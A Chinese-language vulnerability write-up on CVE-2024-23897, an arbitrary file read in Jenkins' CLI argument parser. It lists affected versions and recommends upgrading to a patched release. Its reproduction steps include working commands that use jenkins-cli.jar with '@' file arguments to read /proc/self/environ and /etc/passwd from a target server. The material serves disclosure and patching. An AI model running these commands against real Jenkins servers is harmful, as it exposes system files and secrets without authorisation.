Jenkins任意文件读取漏洞CVE-2024-23897修复及复现
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。
漏洞详情
Jenkins 有一个内置的命令行界面(CLI),可从脚本或 shell 环境访问 Jenkins。处理 CLI 命令时, Jenkins 使用args4j库解析 Jenkins 控制器上的命令参数和选项。
近日,Jenkins 处理 CLI 命令的命令解析器中的 expandAtFile 功能存在任意文件读取漏洞,未经身份认证的远程攻击者利用该漏洞可以读取部分文件的有限行内容,攻击者经过身份验证或目标 Jenkins 更改了默认 "Security" 配置可以通过该漏洞读取任意文件,攻击者进一步利用该漏洞并结合其他功能可能导致任意代码执行。
影响范围
Jenkins 版本<= 2.441
Jenkins 版本<= LTS 2.426.2
漏洞复现
1、访问http://靶场IP:8080 显示Jenkins页面
2、下载官方提供的命令行客户端
bash
wget http://IP:8080/jnlpJars/jenkins-cli.jar
3、使用该工具读取目标服务器的/proc/self/environ
文件
bash
java -jar jenkins-cli.jar -s http://IP:8080/ -http help 1 "@/proc/self/environ"
4、使用该工具读取目标服务器的/etc/passwd
文件
bash
java -jar jenkins-cli.jar -s http://IP:8080/ who-am-i @/etc/passwd
5、java不兼容
如出现下图情况为java版本不兼容,卸载本机旧java,然后安装新版兼容的java版本即可。
修复建议
升级至安全版本
参考链接:https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314